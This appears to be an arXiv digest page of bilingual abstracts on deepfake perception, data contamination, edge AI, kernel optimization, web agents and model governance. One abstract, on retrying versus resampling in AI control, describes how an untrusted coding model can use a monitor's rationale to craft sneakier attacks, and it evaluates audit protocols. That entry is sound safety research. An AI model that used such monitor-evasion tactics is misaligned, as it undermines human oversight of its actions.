音频深度伪造近期发展迅速,但其对人类信任真实语音的影响尚未被研究。我们进行了迄今为止最大规模的音频深度伪造感知听辨研究,收集了来自1768名参与者对138个文本转语音和语音转换系统的35532次判断。我们的核心发现是怀疑偏移:与2021年的基线相比,人类对伪造样本的准确率几乎没有变化(72.9%降至71.2%),但对真实样本的准确率从72.7%降至64.1%。参与者并非更难以检测合成伪影,而是越来越不信任真实的语音。由商业和自回归语言模型系统生成的样本最难检测(61.3-65.9%),而传统seq2seq和流匹配模型生成的样本仍然较易识别(75.4-76.8%)。作为参考的机器学习检测器在所有条件下保持超过94.5%的准确率。我们的结果表明,现代深度伪造的主要威胁可能不仅仅是欺骗,而是对真实语音信任的侵蚀。

英文摘要

Audio deepfakes have improved rapidly recently, yet their effect on human trust in real speech remains unstudied. We present the largest listening study on audio deepfake perception to date, collecting 35,532 judgments from 1,768 participants across 138 text-to-speech and voice conversion systems. Our central finding is a skepticism shift: compared to a 2021 baseline, human accuracy on fake samples barely changed (72.9% to 71.2%), but accuracy on real samples dropped from 72.7% to 64.1%. Participants are not worse at detecting synthesis artifacts; rather, they increasingly distrust authentic speech. Samples generated by commercial and autoregressive language model systems proved hardest to detect (61.3 - 65.9%), while those from traditional seq2seq and flow-matching models remain easier to spot (75.4 - 76.8%). An ML detector that served as a reference point maintained over 94.5% accuracy across all conditions. Our results suggest that the primary threat posed by modern deepfakes may not be mere deception, but the erosion of trust in genuine audio.

2605.26133 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Pretraining Data Exposure in Large Language Models: A Survey of Membership Inference, Data Contamination, and Security Implications

大型语言模型中的预训练数据暴露:成员推断、数据污染及安全影响综述

Ziyi Tong, Feifei Sun, Le Minh Nguyen

发表机构 * Japan Advanced Institute of Science and Technology(日本先进科学研究院)

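AI summary Presents the first unified survey of pretraining data exposure in large language models, covering membership inference and data contamination; it formalizes exposure levels, reviews attack and defense methods, and summarizes empirical findings and future research directions.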

Comments accepted by NLDB 2025

详情
AI中文摘要

大型语言模型(LLMs)已成为NLP中的主导范式,推动了研究和工业的发展。随着模型规模和预训练数据的增长,由于训练数据集的规模和不可见性,对预训练数据暴露(PDE)的担忧也在增加。PDE指的是确定特定数据是否出现在LLM的预训练语料库中。它对于确保评估完整性和保护隐私至关重要,涉及两个关键领域:数据污染和成员推断。尽管概念上相关,但这些领域通常被孤立研究。本文首次在PDE框架下对两者进行了统一综述。我们形式化了跨暴露级别的PDE,回顾了攻击和防御方法,综合了实证发现,并强调了开放的挑战和未来的研究方向。

英文摘要

Large Language Models (LLMs) have become the predominant paradigm in NLP, advancing both research and industry. As model sizes and pretraining data grow, concerns about Pretraining Data Exposure (PDE) increase due to the scale and opacity of training datasets. PDE refers to determining whether specific data appeared in an LLM's pretraining corpus. It is critical for ensuring evaluation integrity and protecting privacy, intersecting two key areas: data contamination and membership inference. Though conceptually related, these areas have often been studied in isolation. This paper offers the first unified survey of both under the PDE framework. We formalize PDE across exposure levels, review attack and defense methods, synthesize empirical findings, and highlight open challenges and future research directions.

2605.26119 2026-05-27 cs.DC cs.AI 版本更新

Edge AI Deployment Beyond Models: A BSP-Aware Systems Framework for Industrial Embedded Platforms

超越模型的边缘AI部署:面向工业嵌入式平台的BSP感知系统框架

Pitchai Muthu M

发表机构 * Advantech Industrial Computing India Pvt. Ltd.(Advantech印度工业计算有限公司)

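AI summary Proposes a five-layer BSP-aware systems framework that treats Edge AI deployment as a systems-engineering problem, addressing the integration of models with the hardware, BSP, and runtime on industrial embedded platforms, with the aim of improving reproducibility, diagnosability, sustained throughput, and field reliability.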

Comments 17 pages, 5 figures, industrial white paper

详情
AI中文摘要

工业边缘AI项目通常从模型开始,之后才面对平台。这种顺序具有吸引力,因为它允许早期演示,但当部署目标是具有长产品生命周期、供应商特定内核、异构加速器、安全约束和非平凡I/O路径的嵌入式系统时,这种方法就会失效。在这种环境中,模型只是从传感器开始、经过板级支持包(BSP)、最终进入生产服务循环的更大执行链中的一个组成部分。本文认为,稳健的边缘AI部署必须被视为一个系统问题,而不是一个后期应用打包练习。本文提出了一个面向工业嵌入式平台的BSP感知框架,围绕五个层次组织:硬件、BSP/操作系统适配、运行时与加速、应用/推理、以及运维/验证。讨论基于Android、NXP i.MX、NVIDIA Jetson、ONNX Runtime和TensorRT的供应商架构文档,以及关于嵌入式AI基准测试、设备不稳定性和异构边缘机群的系统文献。结果是一个实用框架,将底层平台工作与可衡量的部署成果(如可复现性、可诊断性、持续吞吐量和现场可靠性)联系起来。

英文摘要

Industrial Edge AI programs often begin with the model and only later confront the platform. That sequencing is attractive because it allows early demonstrations, but it breaks down when the deployment target is an embedded system with long product lifecycles, vendor-specific kernels, heterogeneous accelerators, safety constraints, and nontrivial I/O paths. In that environment, a model is only one component of a larger execution chain that begins at the sensor, traverses the board support package (BSP), and ends in a production service loop. This paper argues that robust Edge AI deployment must be treated as a systems problem rather than a late-stage application packaging exercise. The paper presents a BSP-aware framework for industrial embedded platforms organized around five layers: hardware, BSP/operating-system adaptation, runtime and acceleration, application/inference, and operations/validation. The discussion is grounded in vendor architecture documentation for Android, NXP i.MX, NVIDIA Jetson, ONNX Runtime, and TensorRT, and in systems literature on embedded AI benchmarking, device instability, and heterogeneous edge fleets. The result is a practical framework that connects low-level platform work to measurable deployment outcomes such as reproducibility, diagnosability, sustained throughput, and field reliability.

2605.26118 2026-05-27 cs.DC cs.AI 版本更新

Xe-Forge: Multi-Stage LLM-Powered Kernel Optimization for Intel GPU

Xe-Forge:面向Intel GPU的多阶段LLM驱动的内核优化

Marcin Spoczynski, Daniel Fleischer, Moshe Berchansky, Gabriela Ben-Melech Stan, Shira Guskin, Weilin Xu, Adam Siemieniuk, Alexander Heinecke

发表机构 * Intel Corporation(英特尔公司)

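AI summary Proposes Xe-Forge, a multi-stage LLM pipeline that uses Chain-of-Verification-and-Refinement (CoVeR) agents and on-hardware validation to automatically optimize Triton kernels for Intel GPUs, achieving a 1.17x geometric-mean speedup and 2-13.3x speedups on Flash Attention.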

详情
AI中文摘要

将深度学习算法移植到新的硬件加速器上,要求开发人员对其代码库中的每个Triton内核重复应用相同的底层优化——量化、内存访问合并、分块大小调整以及特定架构的变通方法。这种手动、重复的工作是一个主要瓶颈:每个内核都需要针对不同设备间变化的硬件约束进行相同的试错分析,而底层的优化模式却基本一致。我们提出了Xe-Forge,一个多阶段LLM驱动的流水线,为Intel GPU自动化这一过程。给定一个功能正确的Triton内核,该系统应用多达九个优化阶段——从算法重构和算子融合,到块指针现代化、GPU特定调优和开放式探索——每个阶段由一个Chain-of-Verification-and-Refinement(CoVeR)代理驱动,该代理生成候选方案,在真实硬件上验证,并对失败进行迭代。一个精心策划的知识库编码了Intel GPU约束(2的幂次线程束计数、GRF模式、SLM大小),这些约束在LLM训练数据中缺失,使模型保持在架构有效范围内。我们在97个Level-2 KernelBench内核和Intel Arc Pro B70上的Flash Attention上评估了Xe-Forge,实现了相对于PyTorch eager的几何平均1.17倍加速,67%的内核得到改进,九个内核超过5倍(最高82倍),并且在所有测试配置下Flash Attention加速2-13.3倍且无回归——这表明结构化领域知识与硬件在环验证可以系统地消除当前阻碍算法在新加速器上部署的重复移植工作。

英文摘要

Porting deep learning algorithms to new hardware accelerators requires developers to repeatedly apply the same low-level optimizations -- quantization, memory access coalescing, tile size tuning, and architecture-specific workarounds -- to every Triton kernel in their code-base. This manual, repetitive effort is a major bottleneck: each kernel demands the same cycle of trial-and-error profiling against hardware constraints that vary across devices, yet the underlying optimization patterns remain largely consistent. We present Xe-Forge, a multi-stage LLM-powered pipeline that automates this process for Intel GPU. Given a functionally correct Triton kernel, the system applies up to nine optimization stages -- from algorithmic restructuring and operator fusion through block pointer modernization, GPU-specific tuning, and open-ended discovery -- each driven by a Chain-of-Verification-and-Refinement (CoVeR) agent that generates candidates, validates them on real hardware, and iterates on failures. A curated knowledge base encodes Intel GPU constraints (power-of-two warp counts, GRF modes, SLM sizing) that are absent from LLM training data, keeping the model within architecturally valid bounds. We evaluate Xe-Forge on 97 Level-2 KernelBench kernels and Flash Attention on the Intel Arc Pro B70, achieving a 1.17x geometric mean speedup over PyTorch eager with 67% of kernels improving, nine kernels exceeding 5x (up to 82x), and 2--13.3x speedups on Flash Attention across all tested configurations without regression -- demonstrating that structured domain knowledge with hardware-in-the-loop verification can systematically eliminate the repetitive porting effort that currently gates algorithm deployment on new accelerators.
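The headline figure above is a geometric mean of per-kernel speedups. As a minimal sketch of how such a summary is usually computed (the speedup values below are hypothetical, not numbers from the paper, and `geometric_mean` is an illustrative helper name):

```python
import math


def geometric_mean(speedups):
    """Geometric mean of positive speedup ratios (baseline time / optimized time)."""
    if not speedups:
        raise ValueError("need at least one speedup")
    if any(s <= 0 for s in speedups):
        raise ValueError("speedups must be positive")
    # Average in log space so that a 2x gain and a 0.5x regression cancel out.
    return math.exp(sum(math.log(s) for s in speedups) / len(speedups))


# Hypothetical per-kernel speedups over an eager baseline.
example = [0.9, 1.0, 1.1, 1.3, 6.0]
print("geometric mean:", round(geometric_mean(example), 3))
print("fraction improved:", sum(s > 1.0 for s in example) / len(example))
```

The geometric mean is less sensitive to a few very large outliers than the arithmetic mean, which may be why a modest overall figure can coexist with individual kernels that improve many times over.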

2605.26047 2026-05-27 cs.AI 版本更新

Retrying vs Resampling in AI Control

AI控制中的重试与重采样

James Lucassen, Adam Kaufman

发表机构 * Redwood Research

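AI summary Studies the safety of retrying and resampling in AI coding scaffolds, finding that retrying leaks information that enables sneakier attacks, whereas resampling with audits on the maximum suspicion score improves safety.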

详情
AI中文摘要

像Claude Code和Codex这样的AI编码脚手架使用重试:阻止标记为有风险的动作并继续轨迹。我们从AI控制的角度研究重试,该角度将模型视为潜在对抗性的。我们发现,虽然重试降低了诚实的怀疑分数,但不可信模型可以利用监控器理由构建更隐蔽的攻击,抵消了安全增益。我们还研究了重采样:从相同上下文中抽取多个样本,这不会泄露可利用的信息。我们解开了先前关于重采样的工作所捆绑的设计选择。在BashArena中,使用Claude Opus 4.6作为不可信模型,MiMo-V2-Flash作为可信监控器,每步抽取五个样本并在最大怀疑分数上审计,在0.3%的审计预算下,安全性从61%提高到71%,且不影响有用性。仅对第一次抽取中看起来可疑的步骤进行选择性重采样,恢复了6.2个百分点的增益,同时仅多抽取了10%的样本。我们在此设置中的两个发现与先前关于重采样的工作相矛盾。第一个是,基于重采样怀疑分数最大值进行审计优于使用最小值,这与Ctrl-Z的发现相反。第二个是,执行最不可疑的样本(这是早期“推迟到重采样”协议的核心机制)在我们的设置中仅带来很小的实证安全增益(+3.9个百分点,置信区间包含零)。

英文摘要

AI coding scaffolds like Claude Code and Codex use retrying: blocking actions flagged as risky and continuing the trajectory. We study retrying from an AI control perspective, which treats the model as potentially adversarial. We find that while retrying reduces honest suspicion scores, the untrusted model can exploit monitor rationale to construct sneakier attacks, negating safety gains. We also study resampling: drawing multiple samples from the same context, which does not leak exploitable information. We disentangle design choices that previous work on resampling had bundled together. In BashArena, with Claude Opus 4.6 as the untrusted model and MiMo-V2-Flash as the trusted monitor, drawing five samples per step and auditing on the maximum suspicion score raises safety from 61% to 71% at a 0.3% audit budget, at no cost to usefulness. Selectively resampling only the steps that look suspicious on the first draw recovers 6.2 percentage points of the gain while drawing only 10% as many extra samples. Two of our findings in this setting contradict earlier work on resampling. The first is that auditing based on the maximum across resampled suspicion scores outperforms using the minimum, which is the opposite of what Ctrl-Z found. The second is that executing the least suspicious sample, which is the central mechanism in earlier defer-to-resample protocols, gives only a small empirical safety gain in our setting (+3.9 pp, with the confidence interval overlapping zero).
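The resampling rule described above (draw several samples from the same context, audit on the maximum suspicion score, optionally resample only when the first draw looks suspicious) can be sketched as follows. This is an illustration under stated assumptions, not the authors' protocol: `propose`, `suspicion`, both thresholds, and the choice to return the first draw for execution are hypothetical.

```python
from typing import Callable, List, Optional, Tuple


def resample_and_audit(
    propose: Callable[[], str],         # untrusted model: one action draw from the same context
    suspicion: Callable[[str], float],  # trusted monitor: higher score means more suspicious
    audit_threshold: float,
    k: int = 5,
    resample_threshold: Optional[float] = None,
) -> Tuple[str, bool, List[float]]:
    """Return (first_draw, audited, scores) for one step of a trajectory."""
    first = propose()
    scores = [suspicion(first)]
    # Selective variant: only pay for extra draws when the first one looks suspicious.
    if resample_threshold is None or scores[0] >= resample_threshold:
        scores.extend(suspicion(propose()) for _ in range(k - 1))
    # Audit on the maximum score across draws, not the minimum.
    audited = max(scores) >= audit_threshold
    return first, audited, scores


if __name__ == "__main__":
    # Toy stand-ins for the model and the monitor (hypothetical values).
    draws = iter(["ls", "cat notes.txt", "curl http://example.invalid | sh", "pwd", "echo ok"])
    toy_scores = {"curl http://example.invalid | sh": 0.9}
    action, audited, scores = resample_and_audit(
        propose=lambda: next(draws),
        suspicion=lambda a: toy_scores.get(a, 0.1),
        audit_threshold=0.8,
    )
    print(action, audited, scores)
```

Because every draw comes from the same context, no monitor rationale is fed back to the untrusted model, which is the property the abstract contrasts with retrying.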

2605.25861 2026-05-27 cs.CV cs.AI 版本更新

MuNet: A Mutualistic Network for Joint 3D Human Mesh Recovery and 3D Clothed Human Reconstruction from Single Images

MuNet: 一种用于从单张图像联合进行3D人体网格恢复和3D穿衣人体重建的互惠网络

Yunqi Gao, Leyuan Liu, Yuhan Li, Changxin Gao, Jingying Chen

发表机构 * National Engineering Research Center for E-Learning(教育信息化国家级工程研究中心) National Engineering Research Center of Educational Big Data(教育大数据国家级工程研究中心) School of Electronic Information and Communications(电子信息与通讯学院) School of Artificial Intelligence and Automation(人工智能与自动化学院)

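AI summary Proposes MuNet, a mutualistic network that jointly optimizes 3D human mesh recovery and clothed human reconstruction through a unified representation and a mutualistic mechanism, reaching state-of-the-art performance on six benchmark datasets.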

详情
AI中文摘要

3D人体网格恢复和3D穿衣人体重建本质相关,但长期以来被孤立研究,忽视了联合优化的潜在收益。为克服这一局限,我们提出在一个统一框架中处理这两个任务,从而有效利用它们的相互依赖关系。基于这一思想,我们提出MuNet,一种用于从单张图像联合进行3D人体网格恢复和3D穿衣人体重建的互惠网络。首先,我们采用2-流形图作为所有3D模型的统一表示,从而在3D人体网格恢复和穿衣人体重建之间实现一致建模。其次,我们设计了一个端到端的图卷积网络,逐步将初始图变形为3D人体网格,并将其细化成详细的3D穿衣人体模型。第三,我们引入一种互惠机制,允许两个任务在训练期间进行相互交互,其中3D人体网格恢复为3D穿衣人体重建提供指导,而重建反馈则细化3D人体网格恢复。我们在六个基准数据集上广泛评估了MuNet,包括Human3.6M、3DPW、MPI-INF-3DHP、THuman2.0、CAPE和RenderPeople。实验结果表明,MuNet在所有数据集上的两个任务均达到了最先进的性能。MuNet的代码已在https://github.com/starVisionTeam/MuNet上发布,供研究使用。

英文摘要

3D human mesh recovery and 3D clothed human reconstruction are inherently related, yet they have long been studied in isolation, thereby overlooking the potential gains of joint optimization. To overcome this limitation, we propose to address these two tasks within a unified framework, which allows their mutual dependencies to be effectively exploited. Building on this idea, we propose MuNet, a mutualistic network for joint 3D human mesh recovery and 3D clothed human reconstruction from single images. First, we adopt 2-manifold graphs as a unified representation for all 3D models, enabling consistent modeling across 3D human mesh recovery and clothed human reconstruction. Second, we design an end-to-end graph convolutional network that progressively deforms an initial graph into a 3D human mesh and refines it into a detailed 3D clothed human model. Third, we introduce a mutualistic mechanism that allows reciprocal interaction between the two tasks during training, where 3D human mesh recovery provides guidance for 3D clothed human reconstruction, and reconstruction feedback refines the 3D human mesh recovery. We extensively evaluate MuNet on six benchmark datasets for 3D human mesh recovery and 3D clothed human reconstruction, including Human3.6M, 3DPW, MPI-INF-3DHP, THuman2.0, CAPE, and RenderPeople. Experimental results demonstrate that MuNet achieves state-of-the-art performance on both tasks across all datasets. The code of MuNet is released for research purposes at https://github.com/starVisionTeam/MuNet.

2605.24785 2026-05-27 cs.AI 版本更新

PANDO: Efficient Multimodal AI Agents via Online Skill Distillation

PANDO: 通过在线技能蒸馏实现高效多模态AI智能体

Yubo Li, Yidi Miao, Yuntian Shen, Yuxin Liu

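AI summary Proposes PANDO, a framework that uses online skill distillation, a structured Skill Library, and cache-aware prompting to achieve a higher success rate on VisualWebArena tasks with lower token consumption.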

详情
AI中文摘要

近期多模态网络智能体的进展通常依赖于增加推理时的计算量,包括展开搜索、验证器传递、离线技能发现和专家模型堆叠。这引发了一个核心问题:网络智能体能否随着经验积累变得更高效,而不是更昂贵?我们首先分析VisualWebArena的轨迹,识别出三个反复出现的低效来源:重复动作循环、隐藏发现成本和低提示缓存复用。然后,我们引入PANDO,一个单次展开的在线技能蒸馏框架,它维护一个结构化的技能库,并结合进度反思、基于置信度的技能降级、层次化路由、视觉压缩和缓存感知提示。在全部910个VisualWebArena任务上,PANDO实现了58.3%的成功率,优于SGV(54.0%)和我们的WALT复现(45.2%),同时比SGV少使用58%的token,比WALT少使用61%的token,且无需任何预评估发现预算。一个300任务的消融实验进一步表明,规则和例程提供了大部分成功增益,而路由、压缩和缓存感知提示将更大的技能库转化为更低的边际token成本。最后,我们引入三个轨迹级效率指标——动作重复率、步骤开销比和提示缓存利用率——以使效率在终端成功之外可见。

英文摘要

Recent advances in multimodal web agents often rely on increased inference-time computation, including rollout search, verifier passes, offline skill discovery, and specialist model stacks. This raises a central question: can a web agent become more efficient as it accumulates experience, rather than more expensive? We first analyze trajectories from VisualWebArena and identify three recurring sources of inefficiency: repeat-action loops, hidden discovery costs, and low prompt-cache reuse. We then introduce PANDO, a single-rollout online skill-distillation framework that maintains a structured Skill Library and combines progress reflection, confidence-based skill demotion, hierarchical routing, visual compression, and cache-aware prompting. On the full set of 910 VisualWebArena tasks, PANDO achieves a 58.3% success rate, outperforming SGV (54.0%) and our WALT reproduction (45.2%), while using 58% fewer tokens than SGV and 61% fewer tokens than WALT, without any pre-evaluation discovery budget. A 300-task ablation further shows that rules and routines provide most of the success gains, while routing, compression, and cache-aware prompting convert the larger skill library into lower marginal token cost. Finally, we introduce three trajectory-level efficiency metrics -- Action Repetition Rate, Step Overhead Ratio, and Prompt Cache Utilization -- to make efficiency visible beyond terminal success.

2605.24383 2026-05-27 cs.AI cs.CY cs.SE 版本更新

A governance horizon for ethical-use constraints in open-weight AI models

开放权重AI模型中伦理使用约束的治理视野

Weiwei Xu, Hengzhi Ye, Haoran Ye, Kai Gao, Vladimir Filkov, Minghui Zhou

发表机构 * School of Computer Science(计算机科学学院) Ministry of Education(教育部) Laboratory of High Confidence Software Technologies(高可信软件技术实验室) University of Science and Technology Beijing(北京科技大学) University of California, Davis(加州大学戴维斯分校)

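AI summary An audit of model repositories on Hugging Face Hub finds that disclosure-based governance has a shallow, structurally limited reach in open-weight AI; the paper introduces the concept of a governance horizon and compares the effects of different policy designs.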

详情
AI中文摘要

对开放权重AI模型的伦理约束既反映了社会关切,也是AI治理政策的基础。这些约束预计会传播到下游衍生品,同时作为自愿元数据披露实施,必须在每一代重用中重新声明。我们审计了Hugging Face Hub上的2,142,823个模型仓库,以测试这种基于披露的治理基础设施能否在深层模型谱系中维持可追溯性。限制证据以1.31个衍生步骤的半衰期衰减($R^2$=0.98),超过七代下游后,至少80%的后代模型缺乏足够的公开证据进行治理判定,我们将这一深度边界形式化为治理视野。恢复缺失许可元数据的平台级干预表明,政策设计(而非仅执法)是约束因素:仅继承设计需要近乎完全的执法才能移动视野,而明确解决孤儿谱系组件的强制声明设计即使在中等执法水平下也能移动视野。结构性瓶颈在于没有可继承上游意图的谱系:此类孤儿组件在任何仅继承政策下都无法判定,无论执法率如何,未解决的上游节点还会造成直接的下游不可判定性瓶颈,仅靠继承规则无法恢复。与PyPI的比较(其中治理信号由显式机器可读声明携带)证实,这种崩溃是开放权重衍生特有的拓扑结构问题,而非开放生态系统固有的。这些结果表明,基于披露的治理在开放权重AI中具有浅层、结构决定的范围,实现深层供应链问责需要治理信号通过衍生本身传播的溯源机制。

英文摘要

Ethical constraints on open-weight AI models are both a reflection of societal concerns and a foundation for AI governance policy. They are expected to propagate to downstream derivatives while implemented as voluntary metadata disclosures that must be restated at each generation of reuse. We audit 2,142,823 model repositories on Hugging Face Hub to test whether this disclosure-based governance infrastructure can sustain traceability across deep model lineages. Restriction evidence decays with a half-life of 1.31 derivation steps ($R^2$=0.98), and beyond seven downstream generations at least 80% of descendant models lack sufficient public evidence for a governance determination, a depth boundary we formalize as the governance horizon. Platform-level interventions to restore missing licence metadata reveal that policy design (not enforcement alone) is the binding factor: inheritance-only designs require near-complete enforcement to move the horizon, whereas a mandatory-declaration design that explicitly resolves orphan lineage components shifts the horizon already at moderate enforcement. The structural bottleneck is lineages with no inheritable upstream intent: such orphan components remain undecidable under any inheritance-only policy regardless of enforcement rate, and unresolved upstream nodes additionally create direct downstream undecidability bottlenecks that inheritance rules alone cannot recover. Comparison with PyPI, where governance signals are carried by explicit machine-readable declarations, corroborates that the collapse is topology-specific to open-weight derivation rather than inherent to open ecosystems. These results establish that disclosure-based governance has a shallow, structurally determined reach in open-weight AI, and that achieving deep supply-chain accountability requires provenance mechanisms propagating governance signals through derivation itself.
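To give a feel for what a half-life of 1.31 derivation steps implies, the sketch below assumes pure exponential decay of restriction evidence with depth. The functional form and the helper name `remaining_fraction` are assumptions made for illustration; the abstract reports only the half-life and the fit quality, and the 80% undecidability figure is a separate quantity that this arithmetic does not reproduce.

```python
def remaining_fraction(depth: float, half_life: float = 1.31) -> float:
    """Fraction of restriction evidence left after `depth` derivation steps,
    assuming exponential decay with the given half-life (an assumption)."""
    if half_life <= 0:
        raise ValueError("half_life must be positive")
    return 0.5 ** (depth / half_life)


# Evidence remaining at each generation under the assumed decay model.
for depth in range(0, 8):
    print(depth, round(remaining_fraction(depth), 3))
```

Under this assumed model the evidence halves roughly every generation and a third, so only a small share survives a handful of derivation steps.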

2605.24297 2026-05-27 cs.IR cs.AI 版本更新

Benchmarking Patent Embeddings: A Multi-Task Evaluation of 22 Models Across Retrieval, Classification, and Clustering

专利嵌入基准测试:跨检索、分类和聚类任务的22个模型多任务评估

Amirhossein Yousefiramandi, Ciaran Cooney

发表机构 * Clarivate, Intellectual Property(Clarivate知识产权)

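AI summary Evaluating 22 pre-trained models on three tasks shows that the optimal fine-tuning recipe depends on the downstream task and that single-landscape fine-tuning harms cross-landscape retrieval.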

Comments 31 pages, 21 figures

详情
AI中文摘要

关于从业者使用专利嵌入的两个问题出现:(i) 一种微调方案是否适用于所有下游应用?(ii) 在一个专利领域上的微调是否足以用于其他领域的下游应用?通过评估22个预训练嵌入模型(参数从22M到12B)在三个任务——信息检索、分类和聚类——上的表现,使用113,148件WIPO辅助技术专利(46,069个引文查询)和外部DAPFAM数据集,我们发现两个结果对普遍认知提出了质疑。(i) 最优微调方案取决于下游任务:跨截面对齐(方案R3)对检索性能提升最大(+7.1% nDCG@10),而组合信号方案(方案R4)更适合分类(+7.1 F1)和聚类(+10.9 V-measure);匹配数据控制证实训练数据集大小的差异不是影响因素。(ii) 单一领域微调损害了跨领域信息检索:在DAPFAM语料库上,对8个模型-方案组合中的5个,单一领域微调显著降低了跨域检索性能,其中零样本能力较强的模型受损最严重。虽然族内扩展一致(Qwen3 0.6B->4B->8B;Llama-Nemotron 1B->8B),但族间扩展不稳定;12B的KaLM-Gemma3在TAC检索性能上排名第8,经过前缀修改后。标题+摘要+权利要求是普遍最佳文本视图,所有模型在域内和域外性能之间存在55-65%的差距,且无法通过混合BM25-密集融合来弥补。代码和评估框架已公开。

英文摘要

Two questions regarding practitioners' use of patent embeddings arise: (i) Does one fine-tuning recipe suffice for all downstream applications? (ii) Is fine-tuning on one patent landscape sufficient for downstream application on other landscapes? By evaluating 22 pre-trained embedding models (ranging from 22M to 12B parameters) on three tasks -- information retrieval, classification, and clustering -- on 113,148 WIPO patents for assistive technology (46,069 citation queries) and on an external DAPFAM dataset, we find two results that cast doubt on the prevailing wisdom. (i) The optimal fine-tuning recipe depends on the downstream task: cross-sectional alignment (recipe R3) provides the largest improvements to retrieval performance (+7.1% nDCG@10), whereas a combined signal recipe (recipe R4) is better suited to classification (+7.1 F1) and clustering (+10.9 V-measure); a matched data control confirms that differences in training dataset size are not a contributing factor. (ii) Single-landscape fine-tuning hampers cross-landscape information retrieval: fine-tuning on one landscape significantly degrades cross-domain retrieval for 5 of 8 model-recipe combinations on the DAPFAM corpus, with the stronger zero-shot models suffering most. While within-family scaling is consistent (Qwen3 0.6B->4B->8B; Llama-Nemotron 1B->8B), cross-family scaling is erratic; the 12B KaLM-Gemma3 is ranked 8th on TAC retrieval performance, following prefix modification. Title+Abstract+Claims is consistently the best text view, and all models suffer from a 55-65% gap between in-domain and out-of-domain performance, which hybrid BM25-dense fusion cannot mitigate. Code and evaluation framework are publicly available.
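Retrieval quality above is reported as nDCG@10. For readers unfamiliar with the metric, here is a minimal sketch using the linear-gain form of DCG (for binary relevance it coincides with the exponential-gain form). Whether the paper uses this exact variant is not stated in the abstract, and the function names are illustrative.

```python
import math


def dcg_at_k(relevances, k=10):
    """Discounted cumulative gain over the top-k items of a ranked list."""
    return sum(rel / math.log2(rank + 2) for rank, rel in enumerate(relevances[:k]))


def ndcg_at_k(ranked_relevances, judged_relevances=None, k=10):
    """nDCG@k: DCG of the system ranking divided by DCG of the ideal ranking.

    ranked_relevances: relevance of each retrieved item, in rank order.
    judged_relevances: relevance of all judged items for the query; defaults
    to the retrieved list when no separate judgments are supplied.
    """
    pool = ranked_relevances if judged_relevances is None else judged_relevances
    ideal = dcg_at_k(sorted(pool, reverse=True), k)
    return dcg_at_k(ranked_relevances, k) / ideal if ideal > 0 else 0.0


# One relevant citation retrieved at rank 2 instead of rank 1.
print(round(ndcg_at_k([0, 1, 0, 0]), 4))
```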

2605.24296 2026-05-27 cs.AI cs.IR 版本更新

When Does Synthetic Patent Data Help? Volume-Fidelity Trade-offs in Low-Resource Multi-Label Classification

合成专利数据何时有帮助?低资源多标签分类中的数量-保真度权衡

Amirhossein Yousefiramandi, Ciaran Cooney

发表机构 * Clarivate, Intellectual Property(Clarivate知识产权)

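AI summary Studies the volume-fidelity trade-off when LLM-generated synthetic data is used for multi-label patent classification: volume effects dominate in low-resource settings, fidelity matters more in high-resource settings, and mixing real and synthetic data works best.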

详情
AI中文摘要

关于利用通过LLM生成的合成数据进行多标签专利分类时必须考虑的问题包括:(i) 何时使用此类数据可能有所帮助以及(ii) 为何如此。实际上,前一部分适当调整了通过增加样本量来改进结果的可能性。当前实验涉及六个开源LLM(从3.8B到12B参数),针对辅助技术64个WIPO标签分类的四种真实数据机制。应用了基于标签集条件化的全合成生成方法和释义方法,每种方法与三种分类器类别结合使用。结果表明,BERT-for-Patents的微F1从0.120到0.702的声称改进主要反映了数量效应;实际上,在165个样本中进行有放回复制产生了0.678。因此,相对于对照组的改进为+0.024,而与最佳基线(焦点损失重加权)相比为+0.219。这里要考虑的第二个关键点是随着数据生成机制变化,保真度分数的演变。对于低真实数据机制,数量效应占主导,最大均值差异(MMD)与分类性能之间的相关系数等于r = +0.95。随着使用更多真实数据,相关性变为负值,在1:10机制下达到r = -0.73(Fisher z = +6.47,p < 0.001,Delta r的95% CI [ +0.96, +1.00 ])。在固定预算分配方面,将真实数据(约20-30%)与合成数据(70-80%)结合优于纯合成和纯真实策略。此外,一个能够将原始微F1改进高达+0.58的语料库可能会对Jaccard重叠检索代理产生不利影响。其他体裁的提示族变体可能提供对该现象的一些解释,但使用标准专利过滤器仍使nDCG@10降低26%。

英文摘要

Using LLM-generated synthetic data for multi-label patent classification raises two questions: (i) when does such data help, and (ii) why? Answering the first requires controlling for the gain that comes simply from a larger sample size. The experiments involve six open-source LLMs (from 3.8B to 12B parameters) and four real-data regimes for the classification of 64 WIPO assistive-technology labels. Both full-synthesis generation, conditioned on the label set, and paraphrasing are applied, each in combination with three classifier categories. The claimed improvement in micro F1 for BERT-for-Patents, from 0.120 to 0.702, mainly reflects a volume effect: replication with replacement of 165 examples already yields 0.678. The improvement over this control is therefore +0.024, whereas the improvement over the best baseline (focal-loss reweighting) is +0.219. The second point concerns how fidelity scores behave as the data regime varies. In low real-data regimes the volume effect dominates, and the correlation between maximum mean discrepancy (MMD) and classification performance is r = +0.95. As more real data is used, the correlation inverts and reaches r = -0.73 at the 1:10 regime (Fisher z = +6.47, p < 0.001, 95% CI on Delta r [ +0.96, +1.00 ]). Under a fixed budget, combining real data (about 20-30%) with synthetic data (70-80%) outperforms both purely synthetic and purely real strategies. Moreover, a corpus that improves raw micro F1 by up to +0.58 may adversely affect a Jaccard-overlap retrieval proxy. Prompt-family variations for other genres may partly explain the phenomenon, but using the standard-patent filter still decreases nDCG@10 by 26%.

2605.24217 2026-05-27 cs.AI cs.DC 版本更新

Identifying and Mitigating Systemic Measurement Bias in Production LLM Inference Benchmarks

识别和减轻生产级LLM推理基准中的系统性测量偏差

Ashok Chandrasekar, Jason Kramberger

发表机构 * Google(谷歌)

AI总结 针对生产级LLM推理基准中因客户端排队导致的测量偏差,提出基于多进程的无偏评估框架和归一化输出令牌时间(NTPOT)指标,实现高并发下的准确性能评估。

详情
AI中文摘要

